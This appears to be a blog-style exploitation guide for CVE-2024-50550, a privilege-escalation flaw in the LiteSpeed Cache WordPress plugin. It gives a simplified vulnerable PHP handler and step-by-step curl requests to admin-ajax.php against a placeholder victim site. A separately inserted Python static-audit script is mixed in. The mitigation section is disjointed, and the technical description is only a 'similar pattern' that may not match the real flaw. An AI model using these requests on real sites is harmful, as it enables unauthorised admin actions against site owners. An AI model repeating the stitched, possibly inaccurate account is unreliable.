CVE-2024-50550 - LiteSpeed Cache Privilege Escalation Exploit Guide
TL;DR: CVE-2024-50550 is a serious privilege escalation vulnerability affecting the LiteSpeed Cache WordPress plugin up to version 6.5.1. Anyone with a low-privilege account (like Subscriber) can abuse a flaw in privilege assignment to perform Admin-only actions. In this post, you'll learn what the bug is, whom it affects, where to find more info, and how attackers actually exploit it – with real code.
## What is CVE-2024-50550?
In May 2024, security researchers discovered an access control flaw in the LiteSpeed Cache plugin, used by over 4 million WordPress sites. The bug: non-privileged users can gain extra rights they aren't meant to have — like Admin powers.
- Affected plugins: LiteSpeed Cache versions *up to 6.5.1 (inclusive)*
- Unaffected: Upgraded versions *after 6.5.1*
- Vulnerability type: Incorrect Privilege Assignment (CWE-266) – application mistakenly gives users more rights than intended.
Sites with untrusted users
*If you host clients, or let users create accounts, you are especially at risk.*
## How does the bug happen?
LiteSpeed Cache has several AJAX actions and REST endpoints. Some of these actions are protected by role checks to ensure only admins can run them – for example, clearing the cache sitewide.
But, in vulnerable versions, certain endpoints/checks use weak "current_user_can()" checks with the wrong capability. For example, instead of requiring 'administrator', they check for basic caps like 'read' or 'edit_posts' – which almost anyone (even Subscribers, Contributors) has.
Here is a similar pattern to what attackers leveraged (simplified for clarity):

```php
// File: includes/class-litespeed-ajax.php
add_action('wp_ajax_litespeed_clear_cache', 'lscwp_clear_cache');

function lscwp_clear_cache() {
    if ( ! current_user_can('read') ) { // should be 'manage_options'
        wp_die('You are not allowed to do this!');
    }
    // Dangerous: gives cache purge powers to almost anyone logged in
    LiteSpeed_Cache_API::purge_all();
    wp_send_json_success('Cache cleared!');
}
```
The Mistake:
'read' is too low-level; every registered user can pass this check and clear the cache!
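For site owners reviewing plugin source, here is an added example (not from the original post or the LiteSpeed project): a heuristic static check that flags authenticated `wp_ajax_` handlers whose only `current_user_can()` checks use capabilities Subscribers or Contributors already hold. The `WEAK_CAPS` set, the handler `example_purge_fixed`, and the embedded PHP sample are assumptions constructed for illustration.

```python
import re
# Default WordPress caps: Subscriber has 'read'; Contributor adds the other two.
WEAK_CAPS = {"read", "edit_posts", "delete_posts"}
HOOK_RE = re.compile(r"add_action\(\s*['\"]wp_ajax_(?!nopriv_)(\w+)['\"]\s*,\s*['\"](\w+)['\"]")
CAP_RE = re.compile(r"current_user_can\(\s*['\"]([\w-]+)['\"]")

def function_body(src, name):
    """Return the brace-balanced body of PHP function `name`, or None if absent."""
    m = re.search(r"function\s+" + re.escape(name) + r"\s*\([^)]*\)\s*\{", src)
    if not m:
        return None
    depth, i = 1, m.end()
    while i < len(src) and depth:  # naive: ignores braces inside strings/comments
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        i += 1
    return src[m.end():i - 1]

def audit(src):
    """Map each authenticated wp_ajax_ action to a verdict on its capability check."""
    findings = {}
    for action, callback in HOOK_RE.findall(src):
        body = function_body(src, callback)
        caps = set(CAP_RE.findall(body or ""))
        if body is None:
            findings[action] = "callback not found"
        elif not caps:
            findings[action] = "no capability check"
        elif caps <= WEAK_CAPS:  # only caps that low-privilege roles already hold
            findings[action] = "weak capability: " + ", ".join(sorted(caps))
        else:
            findings[action] = "ok"
    return findings

# Constructed sample: the page's simplified handler plus a hypothetical fixed one.
SAMPLE = r"""
add_action('wp_ajax_litespeed_clear_cache', 'lscwp_clear_cache');
function lscwp_clear_cache() {
    if ( ! current_user_can('read') ) { wp_die('You are not allowed to do this!'); }
    LiteSpeed_Cache_API::purge_all();
}
add_action('wp_ajax_example_purge_fixed', 'example_purge_fixed');
function example_purge_fixed() {
    if ( ! current_user_can('manage_options') ) { wp_send_json_error('Forbidden', 403); }
    LiteSpeed_Cache_API::purge_all();
}
"""

if __name__ == "__main__":
    print(audit(SAMPLE))
```

A handler that mixes a weak and a strong capability is reported as "ok" here, so treat the output as a shortlist for manual review rather than a verdict.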
## How do attackers exploit this?
The exploit is simple:
1. Create a low-privilege account (Subscriber, or Contributor).
2. Send an AJAX request to the vulnerable endpoint (e.g., admin-ajax.php?action=litespeed_clear_cache).
3. Run admin-only functions — such as clearing the site’s cache, revealing sensitive info, or even changing cache settings.
## Step-by-step exploitation
1. Register a test account (or use any non-admin account)
No privilege required – just sign up like any user.
2. Grab a nonce ("_wpnonce") for the action
Some endpoints require a nonce. If the endpoint does not require one, or you can get one (e.g. from the frontend), proceed.
3. Send an AJAX request

```
curl -X POST \
  -b "wordpress_logged_in_xxx=your_cookie_here" \
  -d "action=litespeed_clear_cache" \
  https://victim-site.com/wp-admin/admin-ajax.php
```

Or, if a nonce is needed:

```
curl -X POST \
  -b "wordpress_logged_in_xxx=your_cookie_here" \
  -d "action=litespeed_clear_cache&_wpnonce=xxxxxxxx" \
  https://victim-site.com/wp-admin/admin-ajax.php
```

4. Receive "Cache cleared!" or success response
Congratulations! Your low-priv user can now clear cached content — or perform other admin tasks, depending on the specific endpoint being abused.
## Potential Impact
- Defacement: Attackers can clear or poison cache, overwriting public pages with malicious content.
- DoS: Sudden, global cache purges can spike CPU usage and slow/crash sites.
- Info leaks: Some AJAX endpoints return sensitive info that should only be visible to admins (e.g., logs, site config).
- Privilege Gain: On some setups, this could be chained with other flaws to gain *actual* admin powers.
## Patch / Mitigation
Monitor for unusual cache activity.
References:
- Official advisory by LiteSpeed
- NVD CVE Entry
- WordFence plugin update log
1. Check your plugin version: Go to WordPress Admin > Plugins > LiteSpeed Cache.
2. Check your user roles: Any user below Admin (like Subscriber or Contributor) should *not* be able to clear cache, export settings, or read logs.
## Final Thoughts
Privilege escalation bugs like CVE-2024-50550 happen more often than you think in WordPress plugins. Always review the source if running plugins from outside developers, and lock down user registration if you don’t need it. Update your LiteSpeed Cache to stay safe.
For more details, check the official CVE-2024-50550 NVD page.
## Timeline
Published on: 10/29/2024 10:15:04 UTC
Last modified on: 10/29/2024 14:34:04 UTC